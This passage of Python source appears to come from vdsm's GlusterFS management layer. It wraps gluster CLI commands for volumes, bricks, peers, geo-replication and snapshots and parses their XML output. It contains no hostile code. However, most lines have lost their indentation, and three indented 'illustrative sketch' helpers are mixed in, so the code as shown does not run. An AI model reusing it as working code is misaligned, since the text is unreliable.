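# consume the structure documented in volumeStatus() above. The volume name
# 'gv0' is an assumption; the helper is only defined here, never invoked.
def _exampleReportOfflineBricks(volumeName='gv0'):
    status = volumeStatus(volumeName)
    return [b['brick'] for b in status['bricks'] if b['status'] == 'OFFLINE']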
def _parseVolumeInfo(tree):
"""
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE,
'disperseCount': DISPERSE_COUNT,
'redundancyCount': REDUNDANCY_COUNT,
'isArbiter': [True/False]}, ...}
"""
volumes = {}
for el in tree.findall('volInfo/volumes/volume'):
value = {}
value['volumeName'] = el.find('name').text
value['uuid'] = el.find('id').text
value['volumeType'] = el.find('typeStr').text.upper().replace('-', '_')
status = el.find('statusStr').text.upper()
if status == 'STARTED':
value["volumeStatus"] = VolumeStatus.ONLINE
else:
value["volumeStatus"] = VolumeStatus.OFFLINE
value['brickCount'] = el.find('brickCount').text
value['distCount'] = el.find('distCount').text
value['stripeCount'] = el.find('stripeCount').text
value['replicaCount'] = el.find('replicaCount').text
value['disperseCount'] = el.find('disperseCount').text
value['redundancyCount'] = el.find('redundancyCount').text
value['isArbiter'] = (el.find('arbiterCount').text == '1')
transportType = el.find('transport').text
if transportType == '0':
value['transportType'] = [TransportType.TCP]
elif transportType == '1':
value['transportType'] = [TransportType.RDMA]
else:
value['transportType'] = [TransportType.TCP, TransportType.RDMA]
value['bricks'] = []
value['options'] = {}
value['bricksInfo'] = []
for b in el.findall('bricks/brick'):
value['bricks'].append(b.text)
for o in el.findall('options/option'):
value['options'][o.find('name').text] = o.find('value').text
for d in el.findall('bricks/brick'):
brickDetail = {}
# this try block is to maintain backward compatibility
            # it returns an empty list when gluster does not return a uuid
try:
brickDetail['name'] = d.find('name').text
brickDetail['hostUuid'] = d.find('hostUuid').text
brickDetail['isArbiter'] = (d.find('isArbiter').text == '1')
value['bricksInfo'].append(brickDetail)
except AttributeError:
break
volumes[value['volumeName']] = value
return volumes
def _parseVolumeProfileInfo(tree, nfs):
bricks = []
if nfs:
brickKey = 'nfs'
bricksKey = 'nfsServers'
else:
brickKey = 'brick'
bricksKey = 'bricks'
for brick in tree.findall('volProfile/brick'):
fopCumulative = []
blkCumulative = []
fopInterval = []
blkInterval = []
brickName = brick.find('brickName').text
if brickName == 'localhost':
brickName = _getLocalIpAddress() or _getGlusterHostName()
for block in brick.findall('cumulativeStats/blockStats/block'):
blkCumulative.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('cumulativeStats/fopStats/fop'):
fopCumulative.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
for block in brick.findall('intervalStats/blockStats/block'):
blkInterval.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('intervalStats/fopStats/fop'):
fopInterval.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
bricks.append(
{brickKey: brickName,
'cumulativeStats': {
'blockStats': blkCumulative,
'fopStats': fopCumulative,
'duration': brick.find('cumulativeStats/duration').text,
'totalRead': brick.find('cumulativeStats/totalRead').text,
'totalWrite': brick.find('cumulativeStats/totalWrite').text},
'intervalStats': {
'blockStats': blkInterval,
'fopStats': fopInterval,
'duration': brick.find('intervalStats/duration').text,
'totalRead': brick.find('intervalStats/totalRead').text,
'totalWrite': brick.find('intervalStats/totalWrite').text}})
status = {'volumeName': tree.find("volProfile/volname").text,
bricksKey: bricks}
return status
@gluster_api
@gluster_mgmt_api
def volumeInfo(volumeName=None, remoteServer=None):
"""
Returns:
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE}, ...}
"""
command = _getGlusterVolCmd() + ["info"]
if remoteServer:
command += ['--remote-host=%s' % remoteServer]
if volumeName:
command.append(volumeName)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumesListFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeInfo(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
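# Illustrative sketch (assumed usage, not part of vdsm): filtering the mapping
# returned by volumeInfo() above for volumes that are currently started. The
# helper is only defined for demonstration.
def _exampleListOnlineVolumes():
    info = volumeInfo()
    return [name for name, vol in info.items()
            if vol['volumeStatus'] == VolumeStatus.ONLINE]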
@gluster_mgmt_api
def volumeCreate(volumeName, brickList, replicaCount=0, stripeCount=0,
transportList=[], force=False, arbiter=False):
command = _getGlusterVolCmd() + ["create", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
if arbiter:
command += ["arbiter", "1"]
if transportList:
command += ["transport", ','.join(transportList)]
command += brickList
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('volCreate/volume/id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeStart(volumeName, force=False):
command = _getGlusterVolCmd() + ["start", volumeName]
if force:
command.append('force')
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterVolumeStartFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def volumeStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["stop", volumeName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStopFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeDelete(volumeName):
command = _getGlusterVolCmd() + ["delete", volumeName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeSet(volumeName, option, value):
command = _getGlusterVolCmd() + ["set", volumeName, option, value]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeSetFailedException(rc=e.rc, err=e.err)
def _parseVolumeSetHelpXml(out):
optionList = []
tree = etree.fromstring('\n'.join(out))
for el in tree.findall('option'):
option = {}
for ch in el.getchildren():
option[ch.tag] = ch.text or ''
optionList.append(option)
return optionList
@gluster_mgmt_api
def volumeSetHelpXml():
rc, out, err = _execGluster(_getGlusterVolCmd() + ["set", 'help-xml'])
if rc:
raise ge.GlusterVolumeSetHelpXmlFailedException(rc, out, err)
else:
return _parseVolumeSetHelpXml(out)
@gluster_mgmt_api
def volumeReset(volumeName, option='', force=False):
command = _getGlusterVolCmd() + ['reset', volumeName]
if option:
command.append(option)
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeResetFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeAddBrick(volumeName, brickList,
replicaCount=0, stripeCount=0, force=False):
command = _getGlusterVolCmd() + ["add-brick", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeBrickAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeRebalanceStart(volumeName, rebalanceType="", force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName]
if rebalanceType:
command.append(rebalanceType)
command.append("start")
if force:
command.append("force")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRebalance/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRebalanceStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "stop"]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def _parseVolumeRebalanceRemoveBrickStatus(xmltree, mode):
"""
returns {'hosts': [{'name': NAME,
'id': UUID_STRING,
'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING},...]
'summary': {'runtime': FLOAT_AS_STRING,
'filesScanned': INT AS STRING,
'filesMoved': INT AS STRING,
'filesFailed': INT AS STRING,
'filesSkipped': INT AS STRING,
'totalSizeMoved': INT AS STRING,
'status': STRING}}
"""
if mode == 'rebalance':
tree = xmltree.find('volRebalance')
elif mode == 'remove-brick':
tree = xmltree.find('volRemoveBrick')
else:
return
st = tree.find('aggregate/statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status = {
'summary': {
'runtime': tree.find('aggregate/runtime').text,
'filesScanned': tree.find('aggregate/lookups').text,
'filesMoved': tree.find('aggregate/files').text,
'filesFailed': tree.find('aggregate/failures').text,
'filesSkipped': tree.find('aggregate/skipped').text,
'totalSizeMoved': tree.find('aggregate/size').text,
'status': statusStr.upper()},
'hosts': []}
for el in tree.findall('node'):
st = el.find('statusStr').text
statusStr = st.replace(' ', '_').replace('-', '_')
status['hosts'].append({'name': el.find('nodeName').text,
'id': el.find('id').text,
'runtime': el.find('runtime').text,
'filesScanned': el.find('lookups').text,
'filesMoved': el.find('files').text,
'filesFailed': el.find('failures').text,
'filesSkipped': el.find('skipped').text,
'totalSizeMoved': el.find('size').text,
'status': statusStr.upper()})
return status
@gluster_mgmt_api
def volumeRebalanceStatus(volumeName):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeReplaceBrickCommitForce(volumeName, existingBrick, newBrick):
command = _getGlusterVolCmd() + ["replace-brick", volumeName,
existingBrick, newBrick, "commit",
"force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeReplaceBrickCommitForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickStart(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["start"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRemoveBrick/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStop(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["stop"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStopFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStatus(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickStatusFailedException(rc=e.rc,
err=e.err)
try:
return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'remove-brick')
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickCommit(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["commit"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickCommitFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeRemoveBrickForce(volumeName, brickList, replicaCount=0):
command = _getGlusterVolCmd() + ["remove-brick", volumeName]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList + ["force"]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRemoveBrickForceFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def peerProbe(hostName):
command = _getGlusterPeerCmd() + ["probe", hostName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def peerDetach(hostName, force=False):
command = _getGlusterPeerCmd() + ["detach", hostName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
if e.rc == 2:
raise ge.GlusterHostNotFoundException(rc=e.rc, err=e.err)
else:
raise ge.GlusterHostRemoveFailedException(rc=e.rc, err=e.err)
def _parsePeerStatus(tree, gHostName, gUuid, gStatus):
hostList = [{'hostname': gHostName,
'uuid': gUuid,
'status': gStatus}]
for el in tree.findall('peerStatus/peer'):
if el.find('state').text != '3':
status = HostStatus.UNKNOWN
elif el.find('connected').text == '1':
status = HostStatus.CONNECTED
else:
status = HostStatus.DISCONNECTED
hostList.append({'hostname': el.find('hostname').text,
'uuid': el.find('uuid').text,
'status': status})
return hostList
@gluster_mgmt_api
def peerStatus():
"""
Returns:
[{'hostname': HOSTNAME, 'uuid': UUID, 'status': STATE}, ...]
"""
command = _getGlusterPeerCmd() + ["status"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterHostsListFailedException(rc=e.rc, err=e.err)
try:
return _parsePeerStatus(xmltree,
_getLocalIpAddress() or _getGlusterHostName(),
hostUUIDGet(), HostStatus.CONNECTED)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
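# Illustrative sketch (assumed usage, not part of vdsm): listing peers that
# peerStatus() above does not report as connected. Defined only as an example.
def _exampleDisconnectedPeers():
    return [peer['hostname'] for peer in peerStatus()
            if peer['status'] != HostStatus.CONNECTED]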
@gluster_mgmt_api
def volumeProfileStart(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "start"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStartFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileStop(volumeName):
command = _getGlusterVolCmd() + ["profile", volumeName, "stop"]
try:
_execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileStopFailedException(rc=e.rc, err=e.err)
return True
@gluster_mgmt_api
def volumeProfileInfo(volumeName, nfs=False):
"""
Returns:
When nfs=True:
{'volumeName': VOLUME-NAME,
'nfsServers': [
{'nfs': SERVER-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
When nfs=False:
{'volumeName': VOLUME-NAME,
'bricks': [
{'brick': BRICK-NAME,
'cumulativeStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int},
'intervalStats': {'blockStats': [{'size': int,
'read': int,
'write': int}, ...],
'fopStats': [{'name': FOP-NAME,
'hits': int,
'latencyAvg': float,
'latencyMin': float,
'latencyMax': float}, ...],
'duration': int,
'totalRead': int,
'totalWrite': int}}, ...]}
"""
command = _getGlusterVolCmd() + ["profile", volumeName, "info"]
if nfs:
command += ["nfs"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeProfileInfoFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeProfileInfo(xmltree, nfs)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeTasks(tree):
"""
returns {TaskId: {'volumeName': VolumeName,
'taskType': TaskType,
'status': STATUS,
'bricks': BrickList}, ...}
"""
tasks = {}
for el in tree.findall('volStatus/volumes/volume'):
volumeName = el.find('volName').text
for c in el.findall('tasks/task'):
taskType = c.find('type').text
taskType = taskType.upper().replace('-', '_').replace(' ', '_')
taskId = c.find('id').text
bricks = []
if taskType == TaskType.REPLACE_BRICK:
bricks.append(c.find('params/srcBrick').text)
bricks.append(c.find('params/dstBrick').text)
elif taskType == TaskType.REMOVE_BRICK:
for b in c.findall('params/brick'):
bricks.append(b.text)
elif taskType == TaskType.REBALANCE:
pass
statusStr = c.find('statusStr').text.upper() \
.replace('-', '_') \
.replace(' ', '_')
tasks[taskId] = {'volumeName': volumeName,
'taskType': taskType,
'status': statusStr,
'bricks': bricks}
return tasks
@gluster_mgmt_api
def volumeTasks(volumeName="all"):
command = _getGlusterVolCmd() + ["status", volumeName, "tasks"]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeTasksFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeTasks(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionStart(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "start"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStartFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionStop(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "stop"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionStopFailedException(rc=e.rc,
err=e.err)
def _parseGeoRepStatus(tree):
"""
Returns:
{volume-name: [{sessionKey: 'key to identify the session',
remoteVolumeName: 'volume in remote gluster cluster'
bricks: [{host: 'local node',
hostUuid: 'uuid of brick host',
brickName: 'brick in the local volume',
remoteHost: 'slave',
status: 'status'
remoteUserName: 'root'
timeZone: 'nodes time zone'
crawlStatus: 'crawlStatus'
lastSynced: 'last synced time'
entry: 'nos of entry operations pending'
data: 'nos of data operations pending'
meta: 'nos of meta operations pending'
failures: 'nos of failures'
checkpointTime: 'checkpoint set time'
checkpointCompletionTime: 'checkpoint completion
time'
checkpointCompleted: 'yes/no'}]...
]....
}
"""
status = {}
for volume in tree.findall('geoRep/volume'):
sessions = []
volumeDetail = {}
for session in volume.findall('sessions/session'):
pairs = []
sessionDetail = {}
sessionDetail['sessionKey'] = session.find('session_slave').text
sessionDetail['remoteVolumeName'] = sessionDetail[
'sessionKey'].split("::")[-1].split(":")[0]
for pair in session.findall('pair'):
pairDetail = {}
pairDetail['host'] = pair.find('master_node').text
pairDetail['hostUuid'] = pair.find(
'master_node_uuid').text
pairDetail['brickName'] = pair.find('master_brick').text
pairDetail['remoteHost'] = pair.find('slave_node').text
pairDetail['remoteUserName'] = pair.find('slave_user').text
pairDetail['status'] = pair.find('status').text
pairDetail['crawlStatus'] = pair.find('crawl_status').text
pairDetail['timeZone'] = _TIME_ZONE
pairDetail['lastSynced'] = pair.find('last_synced').text
if pairDetail['lastSynced'] != 'N/A':
pairDetail['lastSynced'] = calendar.timegm(
time.strptime(pairDetail['lastSynced'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointTime'] = pair.find(
'checkpoint_time').text
if pairDetail['checkpointTime'] != 'N/A':
pairDetail['checkpointTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['checkpointCompletionTime'] = pair.find(
'checkpoint_completion_time').text
if pairDetail['checkpointCompletionTime'] != 'N/A':
pairDetail['checkpointCompletionTime'] = calendar.timegm(
time.strptime(pairDetail['checkpointCompletionTime'],
"%Y-%m-%d %H:%M:%S"))
pairDetail['entry'] = pair.find('entry').text
pairDetail['data'] = pair.find('data').text
pairDetail['meta'] = pair.find('meta').text
pairDetail['failures'] = pair.find('failures').text
pairDetail['checkpointCompleted'] = pair.find(
'checkpoint_completed').text
pairs.append(pairDetail)
sessionDetail['bricks'] = pairs
sessions.append(sessionDetail)
volumeDetail['sessions'] = sessions
status[volume.find('name').text] = volumeDetail
return status
@gluster_mgmt_api
def volumeGeoRepStatus(volumeName=None, remoteHost=None,
remoteVolumeName=None, remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd()
if volumeName:
command.append(volumeName)
if remoteHost and remoteVolumeName:
command.append("%s::%s" % (userAtHost, remoteVolumeName))
command.append("status")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepStatusFailedException(rc=e.rc, err=e.err)
try:
return _parseGeoRepStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionPause(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "pause"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionPauseFailedException(rc=e.rc,
err=e.err)
@gluster_mgmt_api
def volumeGeoRepSessionResume(volumeName, remoteHost, remoteVolumeName,
remoteUserName=None, force=False):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "resume"]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeGeoRepSessionResumeFailedException(rc=e.rc,
err=e.err)
def _parseVolumeGeoRepConfig(tree):
"""
Returns:
{geoRepConfig:{'optionName': 'optionValue',...}
}
"""
conf = tree.find('geoRep/config')
config = {}
for child in conf.getchildren():
config[child.tag] = child.text
return {'geoRepConfig': config}
@gluster_mgmt_api
def volumeGeoRepConfig(volumeName, remoteHost,
remoteVolumeName, optionName=None,
optionValue=None,
remoteUserName=None):
if remoteUserName:
userAtHost = "%s@%s" % (remoteUserName, remoteHost)
else:
userAtHost = remoteHost
command = _getGlusterVolGeoRepCmd() + [volumeName, "%s::%s" % (
userAtHost, remoteVolumeName), "config"]
if optionName and optionValue:
command += [optionName, optionValue]
elif optionName:
command += ["!%s" % optionName]
try:
xmltree = _execGlusterXml(command)
if optionName:
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterGeoRepConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeGeoRepConfig(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotCreate(volumeName, snapName,
snapDescription=None,
force=False):
command = _getGlusterSnapshotCmd() + ["create", snapName, volumeName]
if snapDescription:
command += ['description', snapDescription]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('snapCreate/snapshot/uuid').text,
'name': xmltree.find('snapCreate/snapshot/name').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotDelete(volumeName=None, snapName=None):
command = _getGlusterSnapshotCmd() + ["delete"]
if snapName:
command.append(snapName)
elif volumeName:
command += ["volume", volumeName]
# xml output not used because of BZ:1161416 in gluster cli
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterSnapshotDeleteFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def snapshotActivate(snapName, force=False):
command = _getGlusterSnapshotCmd() + ["activate", snapName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotActivateFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def snapshotDeactivate(snapName):
command = _getGlusterSnapshotCmd() + ["deactivate", snapName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotDeactivateFailedException(rc=e.rc, err=e.err)
def _parseRestoredSnapshot(tree):
"""
returns {'volumeName': 'vol1',
'volumeUuid': 'uuid',
'snapshotName': 'snap2',
'snapshotUuid': 'uuid'
}
"""
snapshotRestore = {}
snapshotRestore['volumeName'] = tree.find('snapRestore/volume/name').text
snapshotRestore['volumeUuid'] = tree.find('snapRestore/volume/uuid').text
snapshotRestore['snapshotName'] = tree.find(
'snapRestore/snapshot/name').text
snapshotRestore['snapshotUuid'] = tree.find(
'snapRestore/snapshot/uuid').text
return snapshotRestore
@gluster_mgmt_api
def snapshotRestore(snapName):
command = _getGlusterSnapshotCmd() + ["restore", snapName]
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotRestoreFailedException(rc=e.rc, err=e.err)
try:
return _parseRestoredSnapshot(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseSnapshotConfigList(tree):
"""
returns {'system':{'snap-max-hard-limit': 'hardlimit',
'snap-max-soft-limit': 'softLimit',
'auto-delete': 'enable/disable',
'activate-on-create': 'enable/disable'},
'volume':{'name' :
{'snap-max-hard-limit: 'hardlimit'}
}
}
"""
systemConfig = {}
systemConfig['snap-max-hard-limit'] = tree.find(
'snapConfig/systemConfig/hardLimit').text
systemConfig['snap-max-soft-limit'] = tree.find(
'snapConfig/systemConfig/softLimit').text
systemConfig['auto-delete'] = tree.find(
'snapConfig/systemConfig/autoDelete').text
systemConfig['activate-on-create'] = tree.find(
'snapConfig/systemConfig/activateOnCreate').text
volumeConfig = {}
for el in tree.findall('snapConfig/volumeConfig/volume'):
config = {}
volumeName = el.find('name').text
config['snap-max-hard-limit'] = el.find('effectiveHardLimit').text
volumeConfig[volumeName] = config
return {'system': systemConfig, 'volume': volumeConfig}
@gluster_mgmt_api
def snapshotConfig(volumeName=None, optionName=None, optionValue=None):
command = _getGlusterSnapshotCmd() + ["config"]
if volumeName:
command.append(volumeName)
if optionName and optionValue:
command += [optionName, optionValue]
try:
xmltree = _execGlusterXml(command)
if optionName and optionValue:
return
except ge.GlusterCmdFailedException as e:
raise ge.GlusterSnapshotConfigFailedException(rc=e.rc, err=e.err)
try:
return _parseSnapshotConfigList(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeSnapshotList(tree):
"""
{'v1': {'snapshots': [{'name': 'snap1_v1',
'description': description of the snapshot,
'id': '8add41ae-c60c-4023'
'-a1a6-5093a5d35603',
'createTime': {'timeZone': 'IST',
'epochTime': 1414427114}
'snapVolume': '5eeaf23def3f446d898e1de8461a6aa7'
'snapVolumeStatus': 'ACTIVATED'}, ...],
'snapRemaining': 252}
}
"""
volume = {}
volumeName = tree.find(
'snapInfo/originVolume/name').text
volume[volumeName] = {
'snapRemaining': tree.find('snapInfo/originVolume/snapRemaining').text,
'snapshots': []
}
if int(tree.find('snapInfo/count').text) == 0:
return {}
